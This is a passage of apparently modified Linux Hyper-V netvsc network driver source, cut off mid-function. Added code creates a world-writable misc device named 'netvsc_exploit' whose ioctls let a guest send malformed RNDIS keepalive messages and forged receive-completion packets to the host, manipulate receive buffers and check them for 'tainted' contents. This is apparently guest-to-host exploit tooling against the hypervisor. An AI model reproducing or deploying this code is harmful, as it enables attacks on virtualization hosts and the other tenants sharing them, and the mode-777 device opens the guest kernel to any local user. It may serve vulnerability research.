1007 | u32 *filled, u32 *avail) 1008 | { 1009 | u32 count = nvdev->recv_completion_cnt; 1010 | 1011 | if (mrc->next >= mrc->first) 1012 | *filled = mrc->next - mrc->first; 1013 | else 1014 | *filled = (count - mrc->first) + mrc->next; 1015 | 1016 | *avail = count - *filled - 1; 1017 | } 1018 | 1019 | /* Add receive complete to ring to send to host. */ 1020 | static void enq_receive_complete(struct net_device *ndev, 1021 | struct netvsc_device *nvdev, u16 q_idx, 1022 | u64 tid, u32 status) 1023 | { 1024 | struct netvsc_channel *nvchan = &nvdev->chan_table[q_idx]; 1025 | struct multi_recv_comp *mrc = &nvchan->mrc; 1026 | struct recv_comp_data *rcd; 1027 | u32 filled, avail; 1028 | 1029 | recv_comp_slot_avail(nvdev, mrc, &filled, &avail); 1030 | 1031 | if (unlikely(filled > NAPI_POLL_WEIGHT)) { 1032 | send_recv_completions(ndev, nvdev, nvchan); 1033 | recv_comp_slot_avail(nvdev, mrc, &filled, &avail); 1034 | } 1035 | 1036 | if (unlikely(!avail)) { 1037 | netdev_err(ndev, "Recv_comp full buf q:%hd, tid:%llx\n", 1038 | q_idx, tid); 1039 | return; 1040 | } 1041 | 1042 | rcd = mrc->slots + mrc->next; 1043 | rcd->tid = tid; 1044 | rcd->status = status; 1045 | 1046 | if (++mrc->next == nvdev->recv_completion_cnt) 1047 | mrc->next = 0; 1048 | } 1049 | 1050 | static int netvsc_receive(struct net_device *ndev, 1051 | struct netvsc_device *net_device, 1052 | struct net_device_context *net_device_ctx, 1053 | struct hv_device *device, 1054 | struct vmbus_channel *channel, 1055 | const struct vmpacket_descriptor *desc, 1056 | struct nvsp_message *nvsp) 1057 | { 1058 | const struct vmtransfer_page_packet_header *vmxferpage_packet 1059 | = container_of(desc, const struct vmtransfer_page_packet_header, d); 1060 | u16 q_idx = channel->offermsg.offer.sub_channel_index; 1061 | char *recv_buf = net_device->recv_buf; 1062 | u32 status = NVSP_STAT_SUCCESS; 1063 | int i; 1064 | int count = 0; 1065 | 1066 | /* Make sure this is a valid nvsp packet */ 1067 | if (unlikely(nvsp->hdr.msg_type != NVSP_MSG1_TYPE_SEND_RNDIS_PKT)) { 1068 | netif_err(net_device_ctx, rx_err, ndev, 1069 | "Unknown nvsp packet type received %u\n", 1070 | nvsp->hdr.msg_type); 1071 | return 0; 1072 | } 1073 | 1074 | if (unlikely(vmxferpage_packet->xfer_pageset_id != NETVSC_RECEIVE_BUFFER_ID)) { 1075 | netif_err(net_device_ctx, rx_err, ndev, 1076 | "Invalid xfer page set id - expecting %x got %x\n", 1077 | NETVSC_RECEIVE_BUFFER_ID, 1078 | vmxferpage_packet->xfer_pageset_id); 1079 | return 0; 1080 | } 1081 | 1082 | count = vmxferpage_packet->range_cnt; 1083 | 1084 | /* Each range represents 1 RNDIS pkt that contains 1 ethernet frame */ 1085 | for (i = 0; i < count; i++) { 1086 | void *data = recv_buf 1087 | + vmxferpage_packet->ranges[i].byte_offset; 1088 | u32 buflen = vmxferpage_packet->ranges[i].byte_count; 1089 | 1090 | /* Pass it to the upper layer */ 1091 | status = rndis_filter_receive(ndev, net_device, device, 1092 | channel, data, buflen); 1093 | } 1094 | 1095 | enq_receive_complete(ndev, net_device, q_idx, 1096 | vmxferpage_packet->d.trans_id, status); 1097 | 1098 | return count; 1099 | } 1100 | 1101 | static void netvsc_send_table(struct hv_device *hdev, 1102 | struct nvsp_message *nvmsg) 1103 | { 1104 | struct net_device *ndev = hv_get_drvdata(hdev); 1105 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1106 | int i; 1107 | u32 count, *tab; 1108 | 1109 | count = nvmsg->msg.v5_msg.send_table.count; 1110 | if (count != VRSS_SEND_TAB_SIZE) { 1111 | netdev_err(ndev, "Received wrong send-table size:%u\n", count); 1112 | return; 1113 | } 1114 | 1115 | tab = (u32 *)((unsigned long)&nvmsg->msg.v5_msg.send_table + 1116 | nvmsg->msg.v5_msg.send_table.offset); 1117 | 1118 | for (i = 0; i < count; i++) 1119 | net_device_ctx->tx_send_table[i] = tab[i]; 1120 | } 1121 | 1122 | static void netvsc_send_vf(struct net_device_context *net_device_ctx, 1123 | struct nvsp_message *nvmsg) 1124 | { 1125 | net_device_ctx->vf_alloc = nvmsg->msg.v4_msg.vf_assoc.allocated; 1126 | net_device_ctx->vf_serial = nvmsg->msg.v4_msg.vf_assoc.serial; 1127 | } 1128 | 1129 | static inline void netvsc_receive_inband(struct hv_device *hdev, 1130 | struct net_device_context *net_device_ctx, 1131 | struct nvsp_message *nvmsg) 1132 | { 1133 | switch (nvmsg->hdr.msg_type) { 1134 | case NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE: 1135 | netvsc_send_table(hdev, nvmsg); 1136 | break; 1137 | 1138 | case NVSP_MSG4_TYPE_SEND_VF_ASSOCIATION: 1139 | netvsc_send_vf(net_device_ctx, nvmsg); 1140 | break; 1141 | } 1142 | } 1143 | 1144 | static int netvsc_process_raw_pkt(struct hv_device *device, 1145 | struct vmbus_channel *channel, 1146 | struct netvsc_device *net_device, 1147 | struct net_device *ndev, 1148 | const struct vmpacket_descriptor *desc, 1149 | int budget) 1150 | { 1151 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1152 | struct nvsp_message *nvmsg = hv_pkt_data(desc); 1153 | 1154 | switch (desc->type) { 1155 | case VM_PKT_COMP: 1156 | netvsc_send_completion(net_device, channel, device, 1157 | desc, budget); 1158 | break; 1159 | 1160 | case VM_PKT_DATA_USING_XFER_PAGES: 1161 | return netvsc_receive(ndev, net_device, net_device_ctx, 1162 | device, channel, desc, nvmsg); 1163 | break; 1164 | 1165 | case VM_PKT_DATA_INBAND: 1166 | netvsc_receive_inband(device, net_device_ctx, nvmsg); 1167 | break; 1168 | 1169 | default: 1170 | netdev_err(ndev, "unhandled packet type %d, tid %llx\n", 1171 | desc->type, desc->trans_id); 1172 | break; 1173 | } 1174 | 1175 | return 0; 1176 | } 1177 | 1178 | 1179 | static struct hv_device *netvsc_channel_to_device(struct vmbus_channel *channel) 1180 | { 1181 | struct vmbus_channel *primary = channel->primary_channel; 1182 | 1183 | return primary ? primary->device_obj : channel->device_obj; 1184 | } 1185 | 1186 | /* Network processing softirq 1187 | * Process data in incoming ring buffer from host 1188 | * Stops when ring is empty or budget is met or exceeded. 1189 | */ 1190 | int netvsc_poll(struct napi_struct *napi, int budget) 1191 | { 1192 | struct netvsc_channel *nvchan 1193 | = container_of(napi, struct netvsc_channel, napi); 1194 | struct netvsc_device *net_device = nvchan->net_device; 1195 | struct vmbus_channel *channel = nvchan->channel; 1196 | struct hv_device *device = netvsc_channel_to_device(channel); 1197 | struct net_device *ndev = hv_get_drvdata(device); 1198 | int work_done = 0; 1199 | 1200 | /* If starting a new interval */ 1201 | if (!nvchan->desc) 1202 | nvchan->desc = hv_pkt_iter_first(channel); 1203 | 1204 | while (nvchan->desc && work_done < budget) { 1205 | work_done += netvsc_process_raw_pkt(device, channel, net_device, 1206 | ndev, nvchan->desc, budget); 1207 | nvchan->desc = hv_pkt_iter_next(channel, nvchan->desc); 1208 | } 1209 | 1210 | /* If send of pending receive completions suceeded 1211 | * and did not exhaust NAPI budget this time 1212 | * and not doing busy poll 1213 | * then re-enable host interrupts 1214 | * and reschedule if ring is not empty. 1215 | */ 1216 | if (send_recv_completions(ndev, net_device, nvchan) == 0 && 1217 | work_done < budget && 1218 | napi_complete_done(napi, work_done) && 1219 | hv_end_read(&channel->inbound)) { 1220 | hv_begin_read(&channel->inbound); 1221 | napi_reschedule(napi); 1222 | } 1223 | 1224 | /* Driver may overshoot since multiple packets per descriptor */ 1225 | return min(work_done, budget); 1226 | } 1227 | 1228 | /* Call back when data is available in host ring buffer. 1229 | * Processing is deferred until network softirq (NAPI) 1230 | */ 1231 | void netvsc_channel_cb(void *context) 1232 | { 1233 | struct netvsc_channel *nvchan = context; 1234 | struct vmbus_channel *channel = nvchan->channel; 1235 | struct hv_ring_buffer_info *rbi = &channel->inbound; 1236 | 1237 | /* preload first vmpacket descriptor */ 1238 | prefetch(hv_get_ring_buffer(rbi) + rbi->priv_read_index); 1239 | 1240 | if (napi_schedule_prep(&nvchan->napi)) { 1241 | /* disable interupts from host */ 1242 | hv_begin_read(rbi); 1243 | 1244 | __napi_schedule(&nvchan->napi); 1245 | } 1246 | } 1247 | 1248 | /* 1249 | * netvsc_device_add - Callback when the device belonging to this 1250 | * driver is added 1251 | */ 1252 | struct netvsc_device *netvsc_device_add(struct hv_device *device, 1253 | const struct netvsc_device_info *device_info) 1254 | { 1255 | int i, ret = 0; 1256 | int ring_size = device_info->ring_size; 1257 | struct netvsc_device *net_device; 1258 | struct net_device *ndev = hv_get_drvdata(device); 1259 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 1260 | 1261 | net_device = alloc_net_device(); 1262 | if (!net_device) 1263 | return ERR_PTR(-ENOMEM); 1264 | 1265 | net_device->ring_size = ring_size; 1266 | 1267 | /* Because the device uses NAPI, all the interrupt batching and 1268 | * control is done via Net softirq, not the channel handling 1269 | */ 1270 | set_channel_read_mode(device->channel, HV_CALL_ISR); 1271 | 1272 | /* If we're reopening the device we may have multiple queues, fill the 1273 | * chn_table with the default channel to use it before subchannels are 1274 | * opened. 1275 | * Initialize the channel state before we open; 1276 | * we can be interrupted as soon as we open the channel. 1277 | */ 1278 | 1279 | for (i = 0; i < VRSS_CHANNEL_MAX; i++) { 1280 | struct netvsc_channel *nvchan = &net_device->chan_table[i]; 1281 | 1282 | nvchan->channel = device->channel; 1283 | nvchan->net_device = net_device; 1284 | u64_stats_init(&nvchan->tx_stats.syncp); 1285 | u64_stats_init(&nvchan->rx_stats.syncp); 1286 | } 1287 | 1288 | /* Enable NAPI handler before init callbacks */ 1289 | netif_napi_add(ndev, &net_device->chan_table[0].napi, 1290 | netvsc_poll, NAPI_POLL_WEIGHT); 1291 | 1292 | /* Open the channel */ 1293 | printk("[*]hv_netvsc: netvsc_device_add channel:0x%010x\n", device->channel); 1294 | ret = vmbus_open(device->channel, ring_size * PAGE_SIZE, 1295 | ring_size * PAGE_SIZE, NULL, 0, 1296 | netvsc_channel_cb, 1297 | net_device->chan_table); 1298 | 1299 | if (ret != 0) { 1300 | netif_napi_del(&net_device->chan_table[0].napi); 1301 | netdev_err(ndev, "unable to open channel: %d\n", ret); 1302 | goto cleanup; 1303 | } 1304 | 1305 | /* Channel is opened */ 1306 | netdev_dbg(ndev, "hv_netvsc channel opened successfully\n"); 1307 | 1308 | napi_enable(&net_device->chan_table[0].napi); 1309 | 1310 | /* Writing nvdev pointer unlocks netvsc_send(), make sure chn_table is 1311 | * populated. 1312 | */ 1313 | rcu_assign_pointer(net_device_ctx->nvdev, net_device); 1314 | 1315 | /* Connect with the NetVsp */ 1316 | ret = netvsc_connect_vsp(device, net_device, device_info); 1317 | if (ret != 0) { 1318 | netdev_err(ndev, 1319 | "unable to connect to NetVSP - %d\n", ret); 1320 | goto close; 1321 | } 1322 | 1323 | return net_device; 1324 | 1325 | close: 1326 | RCU_INIT_POINTER(net_device_ctx->nvdev, NULL); 1327 | napi_disable(&net_device->chan_table[0].napi); 1328 | 1329 | /* Now, we can close the channel safely */ 1330 | vmbus_close(device->channel); 1331 | 1332 | cleanup: 1333 | free_netvsc_device(&net_device->rcu); 1334 | 1335 | return ERR_PTR(ret); 1336 | } 1337 | -------------------------------------------------------------------------------- /ring0/hyperv/netvsc_drv.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Microsoft Corporation. 3 | * 4 | * This program is free software; you can redistribute it and/or modify it 5 | * under the terms and conditions of the GNU General Public License, 6 | * version 2, as published by the Free Software Foundation. 7 | * 8 | * This program is distributed in the hope it will be useful, but WITHOUT 9 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 10 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 11 | * more details. 12 | * 13 | * You should have received a copy of the GNU General Public License along with 14 | * this program; if not, see . 15 | * 16 | * Authors: 17 | * Haiyang Zhang 18 | * Hank Janssen 19 | */ 20 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | //add by 4B5F5F4B 40 | #include 41 | #include 42 | #include 43 | 44 | 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | 52 | #include "hyperv_net.h" 53 | 54 | //add by 4B5F5F4B 55 | #include "hyper_v.h" 56 | 57 | #define RING_SIZE_MIN 64 58 | #define NETVSC_MIN_TX_SECTIONS 10 59 | #define NETVSC_DEFAULT_TX 192 /* ~1M */ 60 | #define NETVSC_MIN_RX_SECTIONS 10 /* ~64K */ 61 | #define NETVSC_DEFAULT_RX 10485 /* Max ~16M */ 62 | 63 | #define LINKCHANGE_INT (2 * HZ) 64 | #define VF_TAKEOVER_INT (HZ / 10) 65 | 66 | static int ring_size = 128; 67 | module_param(ring_size, int, S_IRUGO); 68 | MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)"); 69 | 70 | static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE | 71 | NETIF_MSG_LINK | NETIF_MSG_IFUP | 72 | NETIF_MSG_IFDOWN | NETIF_MSG_RX_ERR | 73 | NETIF_MSG_TX_ERR; 74 | 75 | static int debug = -1; 76 | module_param(debug, int, S_IRUGO); 77 | MODULE_PARM_DESC(debug, "Debug level (0=none,...,16=all)"); 78 | 79 | //add by 4B5F5F4B 80 | static struct hv_device* g_device = NULL; 81 | static struct net_device* g_net_device = NULL; 82 | static struct netvsc_device* g_netvsc_device = NULL; 83 | static struct netvsc_device_info* g_device_info = NULL; 84 | static struct rndis_device* g_rndis_device = NULL; 85 | bool g_block_rndis_thread = false; 86 | 87 | 88 | extern int send_recv_completions(struct net_device *ndev, 89 | struct netvsc_device *nvdev, 90 | struct netvsc_channel *nvchan); 91 | 92 | struct file_operations netvsc_exploit_fops = { 93 | unlocked_ioctl: netvsc_ioctl 94 | }; 95 | 96 | static struct miscdevice netvsc_exploit_device = { 97 | minor: MISC_DYNAMIC_MINOR, 98 | name: "netvsc_exploit", 99 | fops: &netvsc_exploit_fops, 100 | mode: 777 101 | }; 102 | 103 | long netvsc_ioctl(struct file *filp, 104 | unsigned int cmd, 105 | unsigned long arg){ 106 | 107 | int ret = 0; 108 | 109 | switch(cmd) 110 | { 111 | 112 | case HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL: 113 | { 114 | 115 | RECEIVE_BUFFER_INFO recv_buf_info; 116 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(recv_buf_info)) != 0) 117 | { 118 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 119 | return -1; 120 | } 121 | 122 | 123 | recv_buf_info.receive_buffer = vzalloc(recv_buf_info.receive_buffer_size); 124 | if(!recv_buf_info.receive_buffer) 125 | { 126 | printk("[*]netvsc_ioctl: vzalloc fail.\n"); 127 | return -1; 128 | } 129 | ret = vmbus_establish_gpadl(g_device->channel, recv_buf_info.receive_buffer, recv_buf_info.receive_buffer_size, &recv_buf_info.receive_buffer_gpadl_handle); 130 | if(0 != ret) 131 | { 132 | printk("[*]netvsc_ioctl: vmbus_establish_gpadl fail.\n"); 133 | return -1; 134 | } 135 | 136 | if(copy_to_user((void __user*)arg, &recv_buf_info, sizeof(recv_buf_info)) !=0) 137 | { 138 | printk("[*]netvsc_ioctl: copy_to_user fail.\n"); 139 | return -1; 140 | } 141 | break; 142 | } 143 | 144 | case HYPERV_IOCTL_INIT_RECV_BUF_SEND_BUFFER: 145 | { 146 | struct nvsp_message init_packet; 147 | memset(&init_packet, 0, sizeof(struct nvsp_message)); 148 | 149 | u32 gpadl_handle; 150 | if(copy_from_user(&gpadl_handle, (void __user*)arg, sizeof(gpadl_handle)) != 0) 151 | { 152 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 153 | return -1; 154 | } 155 | 156 | init_packet.hdr.msg_type = NVSP_MSG1_TYPE_SEND_RECV_BUF; 157 | init_packet.msg.v1_msg.send_recv_buf.gpadl_handle = gpadl_handle; 158 | init_packet.msg.v1_msg.send_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 159 | 160 | ret = vmbus_sendpacket(g_device->channel, &init_packet, 161 | sizeof(struct nvsp_message), 162 | (unsigned long)&init_packet, 163 | VM_PKT_DATA_INBAND, 164 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 165 | 166 | if(ret != 0) 167 | { 168 | printk("[*]netvsc_ioctl: vmbus_sendpacket send NVSP_MSG1_TYPE_SEND_RECV_BUF fail.\n"); 169 | return -1; 170 | } 171 | 172 | 173 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_RECEIVE_BUFFER success.\n"); 174 | break; 175 | } 176 | 177 | 178 | case HYPERV_IOCTL_DESTROY_RECV_BUF: 179 | { 180 | RECEIVE_BUFFER_INFO recv_buf_info; 181 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(recv_buf_info)) != 0) 182 | { 183 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 184 | return -1; 185 | } 186 | 187 | vfree(recv_buf_info.receive_buffer); 188 | break; 189 | } 190 | 191 | 192 | 193 | case HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE: 194 | { 195 | 196 | bool is_malformed; 197 | struct rndis_request * request; 198 | 199 | if(copy_from_user(&is_malformed, (void __user*)arg, sizeof(is_malformed)) != 0) 200 | { 201 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 202 | return -1; 203 | } 204 | /* 205 | create malformd struct rndis_keepalive_request 206 | */ 207 | request = get_rndis_request(g_rndis_device, RNDIS_MSG_KEEPALIVE, RNDIS_MESSAGE_SIZE(struct rndis_keepalive_request)); 208 | if(is_malformed) 209 | request->request_msg.msg_len = 0x4B; 210 | 211 | if(NULL == request) 212 | { 213 | printk("[*]netvsc_ioctl: get_rndis_request fail.\n"); 214 | return -1; 215 | } 216 | 217 | ret = rndis_filter_send_request(g_rndis_device, request); 218 | if(0 != ret) 219 | { 220 | printk("[*]netvsc_ioctl: rndis_filter_send_request fail.\n"); 221 | return -1; 222 | } 223 | 224 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_KEEPALIVE success.\n"); 225 | break; 226 | } 227 | 228 | case HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY: 229 | { 230 | struct rndis_query_request *query; 231 | struct rndis_request *request = get_rndis_request(g_rndis_device, RNDIS_MSG_QUERY, RNDIS_MESSAGE_SIZE(struct rndis_query_request)); 232 | 233 | query = &request->request_msg.msg.query_req; 234 | query->oid = RNDIS_OID_802_3_PERMANENT_ADDRESS; 235 | query->info_buf_offset = sizeof(struct rndis_query_request); 236 | query->info_buflen = 0; 237 | query->dev_vc_handle = 0; 238 | 239 | ret = rndis_filter_send_request(g_rndis_device, request); 240 | if(0 != ret) 241 | { 242 | printk("[*]netvsc_ioctl: rndis_filter_send_request fail.\n"); 243 | } 244 | else 245 | { 246 | printk("[*]netvsc_ioctl: HYPERV_IOCTL_SEND_QUERY success.\n"); 247 | } 248 | break; 249 | } 250 | 251 | case HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE: 252 | { 253 | 254 | struct netvsc_channel* nvchan = &g_netvsc_device->chan_table[0]; 255 | struct multi_recv_comp *mrc = &nvchan->mrc; 256 | struct recv_comp_msg { 257 | struct nvsp_message_header hdr; 258 | u32 status; 259 | } __packed; 260 | struct recv_comp_msg msg = { 261 | .hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 262 | }; 263 | 264 | const struct recv_comp_data *rcd = mrc->slots + mrc->first; 265 | msg.status = rcd->status; 266 | ret = vmbus_sendpacket(nvchan->channel, &msg, sizeof(msg), rcd->tid, VM_PKT_COMP, 0); 267 | ++mrc->first; 268 | break; 269 | } 270 | 271 | case HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD: 272 | { 273 | if(copy_from_user(&g_block_rndis_thread, (void __user*)arg, sizeof(g_block_rndis_thread)) != 0) 274 | { 275 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 276 | return -1; 277 | } 278 | 279 | if(false == g_block_rndis_thread) 280 | { 281 | int i; 282 | for(i=0;inum_chn;i++) 283 | { 284 | struct netvsc_channel* nvchan = &g_netvsc_device->chan_table[i]; 285 | if(nvchan->channel->primary_channel == NULL) 286 | send_recv_completions(g_net_device, g_netvsc_device, nvchan); 287 | 288 | } 289 | 290 | } 291 | 292 | printk("[*]netvsc_ioctl: g_block_rndis_thread:%d\n", g_block_rndis_thread); 293 | break; 294 | } 295 | 296 | 297 | case HYPERV_IOCTL_CHECK_RECEIVE_BUFFER_TAINTED: 298 | { 299 | RECEIVE_BUFFER_INFO recv_buf_info; 300 | bool tainted = false; 301 | int i, j; 302 | if(copy_from_user(&recv_buf_info, (void __user*)arg, sizeof(RECEIVE_BUFFER_INFO)) != 0) 303 | { 304 | printk("[*]netvsc_ioctl: copy_from_user fail.\n"); 305 | return -1; 306 | } 307 | 308 | u32 recv_buf_page_count = recv_buf_info.receive_buffer_size / PAGE_SIZE; 309 | for(i=recv_buf_page_count-1; i>0; i--) 310 | { 311 | void* base_addr = (char *)recv_buf_info.receive_buffer + i * PAGE_SIZE; 312 | for(j=0; jnvdev); 353 | 354 | rndis_filter_update(nvdev); 355 | } 356 | 357 | static int netvsc_open(struct net_device *net) 358 | { 359 | g_net_device = net; 360 | struct net_device_context *ndev_ctx = netdev_priv(net); 361 | struct net_device *vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 362 | struct netvsc_device *nvdev = rtnl_dereference(ndev_ctx->nvdev); 363 | struct rndis_device *rdev; 364 | int ret = 0; 365 | 366 | netif_carrier_off(net); 367 | 368 | /* Open up the device */ 369 | ret = rndis_filter_open(nvdev); 370 | if (ret != 0) { 371 | netdev_err(net, "unable to open device (ret %d).\n", ret); 372 | return ret; 373 | } 374 | 375 | netif_tx_wake_all_queues(net); 376 | 377 | rdev = nvdev->extension; 378 | 379 | if (!rdev->link_state) 380 | netif_carrier_on(net); 381 | 382 | if (vf_netdev) { 383 | /* Setting synthetic device up transparently sets 384 | * slave as up. If open fails, then slave will be 385 | * still be offline (and not used). 386 | */ 387 | ret = dev_open(vf_netdev); 388 | if (ret) 389 | netdev_warn(net, 390 | "unable to open slave: %s: %d\n", 391 | vf_netdev->name, ret); 392 | } 393 | return 0; 394 | } 395 | 396 | static int netvsc_close(struct net_device *net) 397 | { 398 | struct net_device_context *net_device_ctx = netdev_priv(net); 399 | struct net_device *vf_netdev 400 | = rtnl_dereference(net_device_ctx->vf_netdev); 401 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 402 | int ret = 0; 403 | u32 aread, i, msec = 10, retry = 0, retry_max = 20; 404 | struct vmbus_channel *chn; 405 | 406 | netif_tx_disable(net); 407 | 408 | /* No need to close rndis filter if it is removed already */ 409 | if (!nvdev) 410 | goto out; 411 | 412 | ret = rndis_filter_close(nvdev); 413 | if (ret != 0) { 414 | netdev_err(net, "unable to close device (ret %d).\n", ret); 415 | return ret; 416 | } 417 | 418 | /* Ensure pending bytes in ring are read */ 419 | while (true) { 420 | aread = 0; 421 | for (i = 0; i < nvdev->num_chn; i++) { 422 | chn = nvdev->chan_table[i].channel; 423 | if (!chn) 424 | continue; 425 | 426 | aread = hv_get_bytes_to_read(&chn->inbound); 427 | if (aread) 428 | break; 429 | 430 | aread = hv_get_bytes_to_read(&chn->outbound); 431 | if (aread) 432 | break; 433 | } 434 | 435 | retry++; 436 | if (retry > retry_max || aread == 0) 437 | break; 438 | 439 | msleep(msec); 440 | 441 | if (msec < 1000) 442 | msec *= 2; 443 | } 444 | 445 | if (aread) { 446 | netdev_err(net, "Ring buffer not empty after closing rndis\n"); 447 | ret = -ETIMEDOUT; 448 | } 449 | 450 | out: 451 | if (vf_netdev) 452 | dev_close(vf_netdev); 453 | 454 | return ret; 455 | } 456 | 457 | static void *init_ppi_data(struct rndis_message *msg, u32 ppi_size, 458 | int pkt_type) 459 | { 460 | struct rndis_packet *rndis_pkt; 461 | struct rndis_per_packet_info *ppi; 462 | 463 | rndis_pkt = &msg->msg.pkt; 464 | rndis_pkt->data_offset += ppi_size; 465 | 466 | ppi = (struct rndis_per_packet_info *)((void *)rndis_pkt + 467 | rndis_pkt->per_pkt_info_offset + rndis_pkt->per_pkt_info_len); 468 | 469 | ppi->size = ppi_size; 470 | ppi->type = pkt_type; 471 | ppi->ppi_offset = sizeof(struct rndis_per_packet_info); 472 | 473 | rndis_pkt->per_pkt_info_len += ppi_size; 474 | 475 | return ppi; 476 | } 477 | 478 | /* Azure hosts don't support non-TCP port numbers in hashing for fragmented 479 | * packets. We can use ethtool to change UDP hash level when necessary. 480 | */ 481 | static inline u32 netvsc_get_hash( 482 | struct sk_buff *skb, 483 | const struct net_device_context *ndc) 484 | { 485 | struct flow_keys flow; 486 | u32 hash; 487 | static u32 hashrnd __read_mostly; 488 | 489 | net_get_random_once(&hashrnd, sizeof(hashrnd)); 490 | 491 | if (!skb_flow_dissect_flow_keys(skb, &flow, 0)) 492 | return 0; 493 | 494 | if (flow.basic.ip_proto == IPPROTO_TCP || 495 | (flow.basic.ip_proto == IPPROTO_UDP && 496 | ((flow.basic.n_proto == htons(ETH_P_IP) && ndc->udp4_l4_hash) || 497 | (flow.basic.n_proto == htons(ETH_P_IPV6) && 498 | ndc->udp6_l4_hash)))) { 499 | return skb_get_hash(skb); 500 | } else { 501 | if (flow.basic.n_proto == htons(ETH_P_IP)) 502 | hash = jhash2((u32 *)&flow.addrs.v4addrs, 2, hashrnd); 503 | else if (flow.basic.n_proto == htons(ETH_P_IPV6)) 504 | hash = jhash2((u32 *)&flow.addrs.v6addrs, 8, hashrnd); 505 | else 506 | hash = 0; 507 | 508 | skb_set_hash(skb, hash, PKT_HASH_TYPE_L3); 509 | } 510 | 511 | return hash; 512 | } 513 | 514 | static inline int netvsc_get_tx_queue(struct net_device *ndev, 515 | struct sk_buff *skb, int old_idx) 516 | { 517 | const struct net_device_context *ndc = netdev_priv(ndev); 518 | struct sock *sk = skb->sk; 519 | int q_idx; 520 | 521 | q_idx = ndc->tx_send_table[netvsc_get_hash(skb, ndc) & 522 | (VRSS_SEND_TAB_SIZE - 1)]; 523 | 524 | /* If queue index changed record the new value */ 525 | if (q_idx != old_idx && 526 | sk && sk_fullsock(sk) && rcu_access_pointer(sk->sk_dst_cache)) 527 | sk_tx_queue_set(sk, q_idx); 528 | 529 | return q_idx; 530 | } 531 | 532 | /* 533 | * Select queue for transmit. 534 | * 535 | * If a valid queue has already been assigned, then use that. 536 | * Otherwise compute tx queue based on hash and the send table. 537 | * 538 | * This is basically similar to default (__netdev_pick_tx) with the added step 539 | * of using the host send_table when no other queue has been assigned. 540 | * 541 | * TODO support XPS - but get_xps_queue not exported 542 | */ 543 | static u16 netvsc_pick_tx(struct net_device *ndev, struct sk_buff *skb) 544 | { 545 | int q_idx = sk_tx_queue_get(skb->sk); 546 | 547 | if (q_idx < 0 || skb->ooo_okay || q_idx >= ndev->real_num_tx_queues) { 548 | /* If forwarding a packet, we use the recorded queue when 549 | * available for better cache locality. 550 | */ 551 | if (skb_rx_queue_recorded(skb)) 552 | q_idx = skb_get_rx_queue(skb); 553 | else 554 | q_idx = netvsc_get_tx_queue(ndev, skb, q_idx); 555 | } 556 | 557 | return q_idx; 558 | } 559 | 560 | static u16 netvsc_select_queue(struct net_device *ndev, struct sk_buff *skb, 561 | void *accel_priv, 562 | select_queue_fallback_t fallback) 563 | { 564 | struct net_device_context *ndc = netdev_priv(ndev); 565 | struct net_device *vf_netdev; 566 | u16 txq; 567 | 568 | rcu_read_lock(); 569 | vf_netdev = rcu_dereference(ndc->vf_netdev); 570 | if (vf_netdev) { 571 | txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0; 572 | qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping; 573 | } else { 574 | txq = netvsc_pick_tx(ndev, skb); 575 | } 576 | rcu_read_unlock(); 577 | 578 | while (unlikely(txq >= ndev->real_num_tx_queues)) 579 | txq -= ndev->real_num_tx_queues; 580 | 581 | return txq; 582 | } 583 | 584 | static u32 fill_pg_buf(struct page *page, u32 offset, u32 len, 585 | struct hv_page_buffer *pb) 586 | { 587 | int j = 0; 588 | 589 | /* Deal with compund pages by ignoring unused part 590 | * of the page. 591 | */ 592 | page += (offset >> PAGE_SHIFT); 593 | offset &= ~PAGE_MASK; 594 | 595 | while (len > 0) { 596 | unsigned long bytes; 597 | 598 | bytes = PAGE_SIZE - offset; 599 | if (bytes > len) 600 | bytes = len; 601 | pb[j].pfn = page_to_pfn(page); 602 | pb[j].offset = offset; 603 | pb[j].len = bytes; 604 | 605 | offset += bytes; 606 | len -= bytes; 607 | 608 | if (offset == PAGE_SIZE && len) { 609 | page++; 610 | offset = 0; 611 | j++; 612 | } 613 | } 614 | 615 | return j + 1; 616 | } 617 | 618 | static u32 init_page_array(void *hdr, u32 len, struct sk_buff *skb, 619 | struct hv_netvsc_packet *packet, 620 | struct hv_page_buffer *pb) 621 | { 622 | u32 slots_used = 0; 623 | char *data = skb->data; 624 | int frags = skb_shinfo(skb)->nr_frags; 625 | int i; 626 | 627 | /* The packet is laid out thus: 628 | * 1. hdr: RNDIS header and PPI 629 | * 2. skb linear data 630 | * 3. skb fragment data 631 | */ 632 | slots_used += fill_pg_buf(virt_to_page(hdr), 633 | offset_in_page(hdr), 634 